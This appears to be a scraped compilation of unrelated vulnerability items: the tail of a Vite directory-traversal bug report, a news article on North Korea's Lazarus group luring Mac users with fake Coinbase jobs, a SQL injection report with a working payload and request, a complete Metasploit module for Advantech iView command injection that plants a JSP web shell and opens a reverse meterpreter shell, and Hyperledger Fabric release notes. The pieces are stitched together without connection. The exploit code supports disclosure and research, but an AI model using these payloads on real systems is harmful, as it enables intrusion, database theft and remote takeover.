< Access-Control-Allow-Origin: \*
< Content-Length: 221
< Content-Type: 
< Last-Modified: Tue, 30 Jun 2020 09:41:51 GMT
< ETag: W/"221-1593510111311"
< Cache-Control: no-cache
< Date: Wed, 08 Jun 2022 04:09:49 GMT
< Connection: keep-alive
< Keep-Alive: timeout=5
< 
127.0.0.1	localhost
127.0.1.1	ubuntu

# The following lines are desirable for IPv6 capable hosts
::1     ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
\* Connection #0 to host 192.168.125.129 left intact

**System Info**

Windows

  System:
    OS: Windows 10 10.0.19044
    CPU: (16) x64 AMD Ryzen 7 3800X 8-Core Processor
    Memory: 33.13 GB / 63.93 GB
  Binaries:
    Node: 16.13.2 - C:\\Program Files\\nodejs\\node.EXE
    Yarn: 1.22.10 - ~\\AppData\\Roaming\\npm\\yarn.CMD
    npm: 8.1.2 - C:\\Program Files\\nodejs\\npm.CMD
  Browsers:
    Edge: Spartan (44.19041.1266.0), Chromium (102.0.1245.33)    
    Internet Explorer: 11.0.19041.1566
  npmPackages:
    @vitejs/plugin-vue: ^2.3.3 =\> 2.3.3
    vite: ^2.9.9 =\> 2.9.10

Linux

      System:
        OS: Linux 5.13 Ubuntu 20.04.3 LTS (Focal Fossa)
        CPU: (6) x64 AMD Ryzen 7 3800X 8-Core Processor
        Memory: 12.21 GB / 15.59 GB
        Container: Yes
        Shell: 5.0.17 - /bin/bash
      Binaries:
        Node: 14.18.3 - /usr/bin/node
        Yarn: 1.22.10 - /usr/bin/yarn
        npm: 6.14.15 - /usr/bin/npm
      Browsers:
        Chrome: 97.0.4692.99
        Firefox: 100.0.2
    

**Used Package Manager**

npm

**Validations**

*   Follow our Code of Conduct
*   Read the Contributing Guidelines.
*   Read the docs.
*   Check that there isn't already an issue that reports the same bug to avoid creating a duplicate.
*   Make sure this is a Vite issue and not a framework-specific issue. For example, if it's a Vue SFC related bug, it should likely be reported to https://github.com/vuejs/core instead.
*   Check that this is a concrete bug. For Q&A open a GitHub Discussion or join our Discord Chat Server.
*   The provided reproduction is a minimal reproducible example of the bug.

CVE-2022-35204: Unrestricted directory traversal with `@fs` (Bypass) · Issue #8498 · vitejs/vite

Lazarus continues to expand an aggressive, ongoing spy campaign, using fake Coinbase job openings to lure in victims.

North Korean advanced persistent threat (APT) Lazarus is casting a wider net with its ongoing Operation In(ter)ception campaign, targeting Macs with Apple's M1 chip.

The state-sponsored group is continuing its favored approach of launching phishing attacks under the guise of fake job opportunities. Threat researchers at endpoint detection provider ESET warned this week that it discovered a Mac executable camouflaged as a job description for an engineering manager position at the popular cryptocurrency exchange operator Coinbase.

According to ESET's warning on Twitter, Lazarus uploaded the bogus job offer to VirusTotal from Brazil. Lazarus designed the latest iteration of the malware, Interception.dll, to execute on Macs by loading three files: a PDF document with the fake Coinbase job posting and two executables, FinderFontsUpdater.app and safarifontsagent, according to the alert. The binary can compromise Macs powered both with Intel processors and with Apple's new M1 chipset.

ESET researchers started investigating Operation In(ter)ception nearly three years ago when its researchers discovered attacks against aerospace and military companies. They determined that the campaign's primary goal was espionage, although it also found instances of the attackers using a victim's email account via a business email compromise (BEC) to complete the operation. The Interception.dll malware renders compelling but fake job offers to lure unsuspecting victims, often using LinkedIn.

The Mac attack is the latest in an ongoing barrage of efforts by Lazarus to accelerate Operation In(ter)ception, which has escalated in recent months. ESET published a detailed white paper on the tactic by Lazarus two years ago.

**Risk Mitigated by Apple**

Ironically, the appealing Coinbase job posting targets technically oriented people.

"We suspect that the attackers were in direct contact, so the victim was probably instructed to click whatever popup windows showed up in order to see the 'dream job' offer from Coinbase," Peter Kalnai, a senior malware researcher for ESET, explains to Dark Reading.

Apple revoked the certificate that would enable the malware to execute late last week after ESET alerted the company of the campaign. So now, computers with macOS Catalina v10.15 or later are protected, presuming the user has basic security awareness, Kalnai notes.

"The certificate has been revoked, so it's not possible to execute it until the user adds it to allowed applications," he said. "Only then this remains a threat when the attackers start to be convincing enough to trick the victim to overcome those obstacles with execution. Moreover, when the attackers approach their victim, they very likely verify that the certificate is not revoked, and in case it is, they may create a new, unrevoked certificate."

The ongoing campaign and others from North Korea remain frustrating for government officials. The FBI blamed Lazarus for stealing $625 million in cryptocurrency from Ronin Network, which operates a blockchain platform for the popular NFT game Axie Infinity.

Andrew Grotto, who served as the senior director for cybersecurity policy at the White House in both the Obama and Trump administrations, says North Korea has arisen from an aspiring antagonist into one of the most aggressive threat actors in the world.

"North Korea has been able to acquire skills that may be required to craft really fast," says Grotto, who is now director of the Center for International Security and Cooperation at Stanford University's program on geopolitics, technology and governance. "They quickly emerged as one of the top, if not the top, cyber operators when it comes to high-end potential crimes."

Mac Attack: North Korea's Lazarus APT Targets Apple's M1 Chip

Barangay Management System v1.0 was discovered to contain a SQL injection vulnerability via the hidden_id parameter at /blotter/blotter.php.

**Barangay Management System v1.0 by itsourcecode.com has SQL injection**

Vulnerability Author: Jiang Qian

The decompression password for the source file is itsourcecode.

Login account: admin/admin (Super Admin account)

vendors: https://itsourcecode.com/free-projects/php-project/barangay-management-system-project-in-php-with-source-code/

Vulnerability File: /bmis/pages/blotter/blotter.php

Vulnerability location: /bmis/pages/blotter/blotter.php,hidden\_id

\[+\] Payload: hidden\_id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> hidden\_id

POST /bmis/pages/blotter/blotter.php HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://192.168.1.19/bmis/pages/blotter/blotter.php
Cookie: sessions=aj0k5o11d743ingah9kp1b0ejntrqer6; PHPSESSID=fbu82ocu8kd37b5b20uqq71a35; \_ga=GA1.1.1382961971.1655097107; \_gid=GA1.1.804632123.1655097107
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 329
hidden\_id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+&txt\_edit\_cname=&txt\_edit\_cage=1&txt\_edit\_cadd=1&txt\_edit\_ccontact=1&txt\_edit\_pname=&txt\_edit\_page=1&txt\_edit\_padd=1&txt\_edit\_pcontact=1&txt\_edit\_complaint=1&ddl\_edit\_acttaken=1st+Option&ddl\_edit\_stat=Solved&txt\_edit\_location=1&btn\_save=Save&table\_length=10

CVE-2022-35175: bug_report/SQLi-1.md at main · 1770746252/bug_report

Advantech iView software versions prior to 5.7.04.6469 are vulnerable to an unauthenticated command injection vulnerability via the NetworkServlet endpoint. The database backup functionality passes a user-controlled parameter, backup_file to the mysqldump command. The sanitization functionality only tests for SQL injection attempts and directory traversal, so leveraging the -r and -w mysqldump flags permits exploitation. The command injection vulnerability is used to write a payload on the target and achieve remote code execution as NT AUTHORITY\SYSTEM.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::CmdStager  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Advantech iView NetworkServlet Command Injection',        'Description' => %q{          Versions of Advantech iView software below `5.7.04.6469` are          vulnerable to an unauthenticated command injection vulnerability          via the `NetworkServlet` endpoint.          The database backup functionality passes a user-controlled parameter,          `backup_file` to the `mysqldump` command. The sanitization functionality only          tests for SQL injection attempts and directory traversal, so leveraging the          `-r` and `-w` `mysqldump` flags permits exploitation.          The command injection vulnerability is used to write a payload on the target          and achieve remote code execution as NT AUTHORITY\SYSTEM.        },        'License' => MSF_LICENSE,        'Author' => [          'rgod', # Vulnerability discovery          'y4er', # PoC          'Shelby Pace' # Metasploit module        ],        'References' => [          [ 'URL', 'https://y4er.com/post/cve-2022-2143-advantech-iview-networkservlet-command-inject-rce/'],          [ 'CVE', '2022-2143']        ],        'Platform' => [ 'win' ],        'Privileged' => true,        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD ],        'Targets' => [          [            'Windows Dropper',            {              'Arch' => [ ARCH_X86, ARCH_X64 ],              'Type' => :win_dropper,              'CmdStagerFlavor' => [ 'psh_invokewebrequest', 'vbs' ],              'DefaultOptions' => { 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' }            }          ],          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Type' => :win_cmd,              'DefaultOptions' => { 'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' }            }          ]        ],        'DisclosureDate' => '2022-06-28',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK ]        }      )    )    register_options(      [        Opt::RPORT(8080),        OptString.new('TARGETURI', [ true, 'The base path to Advantech iView', '/iView3']),        OptString.new('USERNAME', [ false, 'The user name to authenticate with', 'admin']),        OptString.new('PASSWORD', [ false, 'The password to authenticate with', 'password'])      ]    )  end  def check    res = send_request_cgi!(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    )    return CheckCode::Unknown('Failed to receive a response from the application') unless res    unless res.body.include?('iView')      return CheckCode::Safe('No confirmation that target is Advantech iView')    end    res = send_db_backup_request('')    return CheckCode::Detected('Failed to receive response from backup request') unless res    # The patch added auth as a requirement for    # accessing the NetworkServlet endpoint    if res.body =~ /ERROR:\s+User\s+Not\sLogin/      @needs_auth = true      print_status('Vulnerability is present, though authentication is required.')    end    CheckCode::Appears  end  def send_db_backup_request(filename)    send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'NetworkServlet'),      'keep_cookies' => true,      'vars_post' =>      {        'page_action_type' => 'backupDatabase',        'backup_filename' => filename      }    )  end  def format_jsp    bin_nums = []    arg_nums = []    flag_nums = []    bin_param.each_char { |c| bin_nums << c.ord }    bin_nums = bin_nums.join(',')    arg_param.each_char { |c| arg_nums << c.ord }    arg_nums = arg_nums.join(',')    flag_param.each_char { |c| flag_nums << c.ord }    flag_nums = flag_nums.join(',')    '<%=new String(com.sun.org.apache.xml.internal.security.utils.JavaUtils.getBytesFromStream((' \    'new ProcessBuilder(request.getParameter(' \    "new java.lang.String(new byte[]{#{bin_nums}}))," \    "request.getParameter(new java.lang.String(new byte[]{#{flag_nums}}))," \    "request.getParameter(new java.lang.String(new byte[]{#{arg_nums}}))).start())" \    '.getInputStream()))%>'  end  def flag_param    @flag_param ||= Rex::Text.rand_text_alpha(3..8)  end  def arg_param    @arg_param ||= Rex::Text.rand_text_alpha(3..8)  end  def bin_param    @bin_param ||= Rex::Text.rand_text_alpha(3..8)  end  def jsp_filename    @jsp_filename ||= "#{Rex::Text.rand_text_alpha(5..12)}.jsp"  end  def execute_command(cmd, _opts = {})    send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, jsp_filename),      'keep_cookies' => true,      'vars_get' =>      {        bin_param => 'cmd.exe',        flag_param => '/c',        arg_param => cmd      }    )  end  def iview_authenticate    res = send_request_cgi!(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path)    )    fail_with(Failure::UnexpectedReply, 'Login page not found') unless res && res.body.include?('loginWindow')    vprint_good('Successfully accessed the login page')    res = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'CommandServlet'),      'keep_cookies' => true,      'vars_post' => {        'page_action_service' => 'UserServlet',        'page_action_type' => 'login',        'user_name' => datastore['USERNAME'],        'user_password' => datastore['PASSWORD'],        'use_ldap' => 'false',        'data' => ''      }    )    unless res && res.body.include?('Success')      fail_with(Failure::BadConfig, 'Authentication failed. Credentials likely incorrect.')    end    vprint_good('Authentication successful!')  end  def need_auth?    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'NetworkServlet')    )    return false unless res    !!(res.body =~ /ERROR:\s+User\s+Not\sLogin/)  end  def exploit    if @needs_auth || need_auth?      iview_authenticate    end    jsp_code = format_jsp    sql_filename = "#{Rex::Text.rand_text_alpha(5..12)}.sql"    full_cmd = "#{sql_filename}\" -r \"./webapps/iView3/#{jsp_filename}\" -w \"#{jsp_code}\""    res = send_db_backup_request(full_cmd)    fail_with(Failure::UnexpectedReply, 'Failed to write JSP file to target') unless res    path = "webapps\\iView3\\#{jsp_filename}"    register_file_for_cleanup(path)    if target['Type'] == :win_dropper      execute_cmdstager    else      execute_command(payload.encoded)    end  endend

Advantech iView NetworkServlet Command Injection

Hyperledger Fabric is an enterprise-grade permissioned distributed ledger framework for developing solutions and applications. If a gateway client application sends a malformed request to a gateway peer it may crash the peer node. Version 2.4.6 checks for the malformed gateway request and returns an error to the gateway client. There are no known workarounds, users must upgrade to version 2.4.6.

**v2.4.6 Release Notes - August 8, 2022****Fixes**

**orderer - Fix active nodes metric**

Fix active nodes metrics for etcdraft ordering service when a node is evicted.

**peer - Handle malformed gateway request**

If a gateway client sends a malformed request to a peer it may crash the peer node.  
This fix checks for the malformed request and returns an error to the gateway client.

**Improvements**

**Make chaincode-as-a-service (ccaas) builder available in all release distributions**

The chaincode-as-a-service (ccaas) builder executables for build, detect, and release are now available in the Fabric release tar at builders/ccaas/bin.

**Dependencies**

Fabric v2.4.6 has been tested with the following dependencies:

*   Go 1.18.2
*   CouchDB v3.2.2

Fabric docker images on dockerhub utilize Alpine 3.16.

**Deprecations (existing)**

**Ordering service system channel is deprecated**

v2.3 introduced the ability to manage an ordering service without a system channel.  
Managing an ordering service without a system channel has privacy, scalability,  
and operational benefits. The use of a system channel is deprecated and may be removed in a future release.  
For information about removal of the system channel, see the Create a channel without system channel documentation.

**FAB-15754: The 'Solo' consensus type is deprecated.**

The 'Solo' consensus type has always been marked non-production and should be in  
use only in test environments, however for compatibility it is still available,  
but may be removed entirely in a future release.

**FAB-16408: The 'Kafka' consensus type is deprecated.**

The 'Raft' consensus type was introduced in v1.4.1 and has become the preferred  
production consensus type. There is a documented and tested migration path from  
Kafka to Raft, and existing users should migrate to the newer Raft consensus type.  
For compatibility with existing deployments, Kafka is still supported,  
but may be removed entirely in a future release.  
Additionally, the fabric-kafka and fabric-zookeeper docker images are no longer updated, maintained, or published.

**Fabric CouchDB image is deprecated**

v2.2.0 added support for CouchDB 3.1.0 as the recommended and tested version of CouchDB.  
If prior versions are utilized, a Warning will appear in peer log.  
Note that CouchDB 3.1.0 requires that an admin username and password be set,  
while this was optional in CouchDB v2.x. See the  
Fabric CouchDB documentation  
for configuration details.  
Also note that CouchDB 3.1.0 default max\_document\_size is reduced to 8MB. Set a higher value if needed in your environment.  
Finally, the fabric-couchdb docker image will not be updated to v3.1.0 and will no longer be updated, maintained, or published.  
Users can utilize the official CouchDB docker image maintained by the Apache CouchDB project instead.

**FAB-7559: Support for specifying orderer endpoints at the global level in channel configuration is deprecated.**

Utilize the new 'OrdererEndpoints' stanza within the channel configuration of an organization instead.  
Configuring orderer endpoints at the organization level accommodates  
scenarios where orderers are run by different organizations. Using  
this configuration ensures that only the TLS CA certificates of that organization  
are used for orderer communications, in contrast to the global channel level endpoints which  
would cause an aggregation of all orderer TLS CA certificates across  
all orderer organizations to be used for orderer communications.

**FAB-17428: Support for configtxgen flag --outputAnchorPeersUpdate is deprecated.**

The --outputAnchorPeersUpdate mechanism for updating anchor peers has always had  
limitations (for instance, it only works the first time anchor peers are updated).  
Instead, anchor peer updates should be performed through the normal config update flow.

**FAB-15406: The fabric-tools docker image is deprecated**

The fabric-tools docker image will not be published in future Fabric releases.  
Instead of using the fabric-tools docker image, users should utilize the  
published Fabric binaries. The Fabric binaries can be used to make client calls  
to Fabric runtime components, regardless of where the Fabric components are running.

**FAB-15317: Block dissemination via gossip is deprecated**

Block dissemination via gossip is deprecated and may be removed in a future release.  
Fabric peers can be configured to receive blocks directly from an ordering service  
node and not gossip blocks by using the following configuration:

    peer.gossip.orgLeader: true
    peer.gossip.useLeaderElection: false
    peer.gossip.state.enabled: false
    peer.deliveryclient.blockGossipEnabled: false
    

**FAB-15061: Legacy chaincode lifecycle is deprecated**

The legacy chaincode lifecycle from v1.x is deprecated and will be removed  
in a future release. To prepare for the eventual removal, utilize the v2.x  
chaincode lifecycle instead, by enabling V2\_0 application capability on all  
channels, and redeploying all chaincodes using the v2.x lifecycle. The new  
chaincode lifecycle provides a more flexible and robust governance model  
for chaincodes. For more details see the  
documentation for enabling the new lifecycle.

**Changes:**

*   8359607 Fix binary package creation
*   c9c60fd Release commit for v2.4.6.
*   468332c Prevent peer from failure on malformed proposal
*   7c12fa6 Extra checks for invalid args in gateway api
*   84e8b3b fix path for make dir CCAAS Builders
*   eb6b172 Add -buildvcs=false for ccaasbuilder (#3556) \[ #3315 \]
*   aa2aaa6 CCAAS Builders
*   0d584c4 Fixed active nodes metrics for etcdraft when a node is evicted. Instead of being frozen we set it to 0 once halt is called. Tests. (#3536)
*   7e2a6b9 Release commit for v2.4.5 (#3505)
*   0f18359 Check if inner consensus message is missing

**See More**

*   1473eca Release commit for v2.4.4 (#3487)
*   6f4282b Fix gossip unit test flake (#3215)
*   a914ec3 Bump Alpine to 3.16 (release-2.4) (#3472)
*   8ffd334 Locate correct block number for transaction ID in ChaincodeEvents (#3289)
*   f64eea2 Refactor of ChaincodeEvents service implementation to support resume (#3283)
*   02d63c3 Add -buildvcs=false for building binaries
*   60638b5 Improved gateway error for transient data failure \[ #3328 \]
*   a6947fa Use any peer to evaluate system chaincode transactions (#3447)
*   135c268 Improve response mismatch logging
*   29fea4f Log proposal response differences (backport #3420)
*   4c6ef91 Bump CouchDB to 3.2.2 (#3369)
*   c8f83e4 caas review comments
*   3c2c2f8 no mdash char supported
*   24e6f34 new caas page
*   6588ed2 Bump Go to 1.18.2 (#3423)
*   e5ad0ef Update chaincode language parameter name
*   ffbd37b Fix hyperlink
*   566a1a6 Fix warning log printing
*   ae316aa Properly handle concurrent building of chaincode packages
*   37cca19 Update cc\_service.md (#3355) (#3366)
*   1c97ab1 Node 16 and v1.4 libraries (#3357)
*   f6e8336 certs mgmt guide (#3307)
*   f614fb5 Additional TLS troubleshooting information (#3346)
*   1fb499a Handle empty policies when traversing the policy tree in discovery policy analysis (#3335)
*   0396bf9 Ignore channel double creation during replication. \[ #2931 \]
*   458345a Add in the CCAAS builders to the tgz package
*   9711fb5 Release commit for v2.4.3
*   47dd17a Ignore expired CA/TLS CA certs on msp init (#3238) (#3249) (#3252)
*   c89ba60 Gateway support for mutual TLS networks (#3235)
*   602f4c6 remove commercial paper references
*   80dbf8e Add Intermediate CA certs to dial options (#3225) (#3226)
*   fad7f69 Release commit for v2.4.2
*   0e9cdb2 Address windows platform in documentation \[ #2993 \]
*   63a7779 Bump Go to 1.17.5 (release-2.4) (#3182) \[ #3114 \]
*   e24c332 Refactor gateway Endorse() method
*   e7cb726 Close connections to stale ordering nodes
*   e1ed78f - Fix failure to generate all possible combinations (#3132)
*   af5d5df v2.4.1 release commit
*   ef5ac00 Update 'Running a Fabric Application' tutorial for Fabric Gateway
*   3580b4e Reduce CPU&memory cost of collecting endorsements
*   fbfdc1d Enable gateway concurrency limits
*   1f87709 Remove discovery.acl principal warning \[ #3006 \]
*   e0bb139 Adding a dedicated external builder
*   654a02b Fix channel config callback in gateway
*   abf5d30 Final peer for gateway (#3091) (#3095)
*   2d8d7f4 Randomize endorsement layouts
*   29d1e21 Network and Orderers for gateway
*   a95a8e7 latest PR review comments
*   41b6586 v2.4.0 release commit (#3078)
*   4f4e096 Update v2.4.0 release notes
*   f15b4ee Add command reference doc for ledgerutil
*   45707ac Add read version to the example in read-write set
*   b0de139 Add logging for identity, policy, and signature troubleshooting
*   1266978 Clarify v2.x upgrade docs (#3083)
*   6a7cdd0 Refine Gateway gRPC error status codes (#3075)
*   40fea67 goimports updates to prepare for Go 1.17 (#3070)
*   c14239c Add gateway ref to private data doc topic
*   a6a9fde EndorsementTimeout should apply to each endorser
*   bd1aaae Reference current application APIs in peer event service docs
*   91951d0 Log the transactionID in all log messages
*   2abb074 Remove redundant SDK documentation page
*   a1c13d8 Updates to endorser and gateway logging
*   34dcb8d Update protobuf definitions
*   5c2e358 Enhance gateway error logic
*   5014709 docs: fixing some typos
*   dee44d9 Don't use EndorseResponse.Result field (#3051)
*   c463b32 Fix CI script syntax
*   44faa13 Enable unaware threshold signature endorsement
*   8a4c7f3 Update Contract and Application API docs for Fabric Gateway (#3048)
*   91d7b7c Updates to Gateway doc topic (#3047)
*   6a415ee collection singular
*   e3abd66 use member of a collection
*   da935d7 Gateway overview edited
*   9c5e1df Clarify ProcessProposal error handling (#3044)
*   f089b24 Reword evaluate() error message
*   688d4d2 Add extra info to error message
*   6926cc1 no gateway via cli - tutorials (#3037)
*   cdc342e Add gateway architecture page to docs
*   534b1c1 Use correct timeout option (#3032)
*   d67d421 Show what do not match (#3012)
*   5113aa9 Better gRPC error on context error from CommitStatus service
*   62fb4c0 Update transaction flow doc for peer gateway
*   40f90c1 Fix typo in comment (#3016)
*   45f4dcb Add chaincode err message to Evaluate err message
*   42c99e0 Add documents for new options of calculatepackageid
*   b1c9d43 Add -O json option to calculatepackageid
*   ee18f9d Return package ID without any prefix by default for calculatepackageid
*   843ff14 Update Sphinx to v1.8.2
*   70ace58 Add integration tests for calculatepackageid command
*   abdb330 Add explanation of stringArray
*   89da86e Reword duplicate error message
*   d8ee1b4 Don’t close connection if already closing
*   31bc120 Retry logic for evaluate
*   7ebb704 Add documents for calculatepackageid command
*   3e433d4 Add calculatepackageid command
*   9ef778a Move to better IsAbs Implementation (#3000)
*   0f08904 Gateway endorsement retry logic
*   b4c2731 fix windows SyncDir issue
*   c90d50a Bump babel from 2.3.4 to 2.9.1 in /docs
*   0f904bb Adjusted from review comments
*   3914549 install-fabric.sh script - updated version of bootstrap.
*   3574d8b Check the package name on core/ledger/kvledger UT (#2987)
*   2ede756 Extra info in log message (#2982)
*   755ba79 set TestBlockPullerBadBlocks pullblock wait time (#2975)
*   b3cf25e Improve health checker docs
*   6897c80 Update developer environment (#2977)
*   21e4914 Rename EndpointError to ErrorDetail (#2974)
*   b52f776 Add clarifications to dev env versions in doc
*   7d51df1 docs: Use html\_style property instead of add\_stylesheet()
*   6656f72 Evaluate() error response for node chaincode
*   0625b10 Rename persistent\_msgs to persistance to avoid protobuf conflict
*   c8a6c43 Sort chaincode interests in tests (#2966)
*   7124587 Add unittest of writting multiple blocks for BlockWriter
*   d0b32ed Add unittest of writting config block synchronously for BlockWriter
*   295853b Write config blocks synchronously in Orderer
*   9636332 Refactor idemix implementation (#2955)
*   4b9ef57 Fix the project status to 'Graduated' instead of 'Active'
*   de9a64d docs: Add the path of softhsm2.conf for macOS
*   e66c951 Improve error messages when no endorsers found (#2963)
*   c62034e Add Information about AWS HSM
*   0d13aa6 Update links for Jira to GitHub issue transition in README
*   cf341ee Improve an error message in InstallChaincode
*   3a93662 Randomize selection of orderer nodes with retry (#2951)
*   210d20f Improve wording of log message
*   83cabf2 correct logger labels after cloning block puller.
*   f97177c Cache channel orderers in registry
*   f9027a4 docs: Don't apply the syntax highlighting of python
*   70ff46a Unit test flake when rpc server stream not closed (#2935)
*   0545ac8 Fixed Found Typos
*   aa8d06b Do not create new chain of type etcdraft.Chain if such exists in map of chains. This can happen when in Raft protocol a channel was created, but not marked as done in WAL logs, so at orderer startup it will try to rerun creation tx and panic because the channel already exists.
*   8999ce7 Apply the style only the key in readwrite.rst (#2933)
*   1243e99 Fix the result message in test\_network.md \[ #394 \]
*   8767ced Fix broken links for international workgroups (#2920)
*   85a67f8 Implement DisregardNamespacePolicy for gateway
*   3594a3b Update docs for Jira to GitHub issue transition
*   a395f3b updated chaincode4ade.rst("Writing your first chaincode") showing good practise on how to achieve determinism in json
*   b735309 Updates in main for v2.3.3
*   e55a388 Minor code clean-up in Gateway ChaincodeEvents handling (#2899)
*   beb8f5d Implement chaincode event replay for Fabric Gateway (#2896)
*   dd539d3 Refactor ChaincodeEvents to use ledger iterator (#2891)
*   b1d7538 Private Data Comparison \[ #2818 \]
*   cbe7d44 Nominate Andrew Coleman as Fabric maintainer
*   b563b08 Fixed a typo in private\_data\_tutorial
*   4875635 Update alpine base image to 3.14 (#2881)
*   7cb82ee Clean up Go modules (main) (#2878)
*   aa76c70 \[Document\] typo fix
*   6ec8d72 Stop spamming for wait channel acquirement in orderer integration test
*   f62e877 Clarify bootstrap.sh message when fabric-samples tag not found
*   868166d Gateway integration tests - adv. endorsement
*   9788c9b Early Differences Flag
*   394fb86 Prepare for next release v2.4.0
*   b0e0c4f fix typo
*   1fbdc18 Update Go to v1.16.7
*   38348fb \[FAB-11334\] - Adds a functional / integration test for peer unjoin channel
*   bc1898e Gateway Evaluate() with transient data
*   540fff8 FAB18529 added nil check in channel header parsing
*   36884f0 Add documentation for AbsoluteMaxBytes
*   98973a8 Options for GRPC message size configurable
*   b64d362 Update bootstrap.sh download script for Fabric CA v1.5.1
*   a330b66 Add release notes for v2.4.0-beta release
*   dac896a Add slash command for invalid issue
*   474badd Better error messages from Gateway
*   497a177 Fix FAB-18528: remove panic in ifConfig func (#2828)
*   c41ffff Fix small doc errors (#2816)
*   99d2e32 Output File Exists Error
*   ea48474 \[FAB-11334\] Adds a 'peer node unjoin' CLI entrypoint to unjoin a peer from a channel (#2769)
*   87ea070 Gateway enabled by default
*   5331bbc FAB-18067 Discovery support Implicit Collections (#2784)
*   240cf0e Merge and enhance coding guidelines across github and wiki
*   bb8bada \[FAB-11334\] Adds a function to purge a ledger's transient storage (#2769)
*   f662d98 FABGW-25 Endorse using generated ChaincodeInterest (#2773)
*   71037f3 Update CHANGELOG.md
*   95fb683 Hardening raft catchup IT
*   463271e FAB 18365 evictionsuspicion failing when osn failed (#2780)
*   fe71474 Additional documentation for implicit private data collections
*   fa3960b FABGW-25 Test for system chaincode (#2771) \[ #2767 \]
*   52b12dc Update private data docs - remove SDK reference (#2770)
*   26ec54a FABGW-25 Build ChaincodeInterest in TX simulator (#2767)
*   e5e623d \[FAB-18527\] Discovery supports DisregardNamespacePolicy hint from client (#2768)
*   9a922fd \[FAB-18527\] Discovery supports state based endorsement queries (#2764)
*   84c1270 \[FABGW-25\] Move chaincode interest to proposal response proto (#2763)
*   ffe7d36 \[FAB-18521\] Fixing flaky IT, send remove tx to another node (#2761) \[ #2748 \]
*   44ab2bf \[FAB-18521\] Replicate block metadata with block while OSN catching up (#2748)
*   2c69863 Update test network tutorial for new profile
*   e4b66f9 Update boostrap.sh for test network
*   cf263b0 \[FAB-11334\] Scrubs partially constructed/deleted ledgers at peer init (#2754)
*   62cd59c fixed peer documents
*   f7f77af fixed peer sample config
*   fda47c5 Renamed Ledger Binary To Ledgerutil (#2746)
*   9736485 \[FAB-11334\] Adds a new 'peer node unjoin' feature (#2732)
*   73c46a1 Updated enrollUser function in write\_first\_app Doc (#2713)
*   965664f Update docs to clarify that an implicit collection can not have an index
*   1249da2 \[FAB-18509\] Stop panic of collection index path is wrong (#2726)
*   9c3d459 \[FAB-18508\] ledger utility always outputs txNum (#2724)
*   4c4e58c File Location Flag (#2709)
*   b5e0d27 Added a possibility to override chaincode.externalBuilders via env variable (#2643)
*   1f1c303 fix typo
*   b034225 \[Doc-Update\] + What is a commercial paper section
*   1ee03b3 Add function to delete the ledger data for a channel (#2722)
*   7151302 Fixed grammatical errors
*   4e2f86e Fix a typo in CouchDB tutorial
*   3a75b65 Use protoc-gen-go 1.3.3 for generating protos \[ #2113 \]
*   8ce450e Fix typo
*   4422a19 Fix peerchaincode.md as well
*   4e67cbe Add explanation of --ctor JSON string
*   cdd5a04 Compare Snapshots Utility
*   d80cd2a Clarify Verify behaviour in PKCS11 Impl
*   d55dc8e fix typo (#2695)
*   8689771 Retire Will Lahti as maintainer (#2704)
*   16259ed Mandate TLS 1.2 or higher in fabhttp package
*   b5a4fe9 Address PR comments in Gateway integration tests
*   52c09b6 Clarify orderers seeing the transaction data
*   aa0b33f Retire Brett Logan as maintainer
*   00910ba Handle missing endpoints from discovery
*   dc09b6e Cherry pick deploy CC fixes to main branch
*   fd218eb Clarify "identity expired" error messages (#2685)
*   d9e850d Fix spelling mistakes in the Github Contributions page
*   3c7fa86 \[FAB-18484\] Return transaction forwarding result back to the client synchronously
*   6fbca49 Update Artem Barger email address (#2671)
*   c81f265 Link fixes detailed in FAB-18494
*   266497f Typo fix in peer deployment guide in main (#2660)
*   b4cd030 Link fixes in create channel tutorial (#2661)
*   dde41d9 Fix link in orderer deployment guide in main
*   b2f7292 Improve mvcc log warnings (#2649)
*   04796e6 Use protobuf Getters to avoid nil reference (#2646)
*   07808a0 Clarify doc for readset validations (#2647)
*   a8dbb68 FABGW-20 Implement TargetOrgs for Evaluate() (#2642)
*   85ae90c Added RetrieveBlockByNumber into blockledger (#2635)
*   1ad4422 Update secured\_private\_asset\_transfer\_tutorial.md
*   1f89be9 FABGW-21: Realtime implementation of ChaincodeEvents service (#2604)
*   34a4186 Fix minor code comment
*   9170fea Return block number along with validation code (#2614)
*   e8e39e6 \[FAB-18479\] Log error if orderer can't forward SubmitRequest to Raft leader
*   f1fc499 fix duplicate entry in code snippet
*   17dc11c Update Building docs to reflect UI changes
*   0334d52 replace brew cask install --appdir='/Applications' docker with brew install --cask docker
*   4e201af Optionally disable gossip block forwarding (#2606)
*   b4efe85 FABGW-20 Specify endorsing organizations (#2578)
*   6f0bef1 Bump vmImage to Ubuntu-20.04
*   f8070ec Maintain order of transactions in the commit notification

This list of changes was auto generated.

Tag
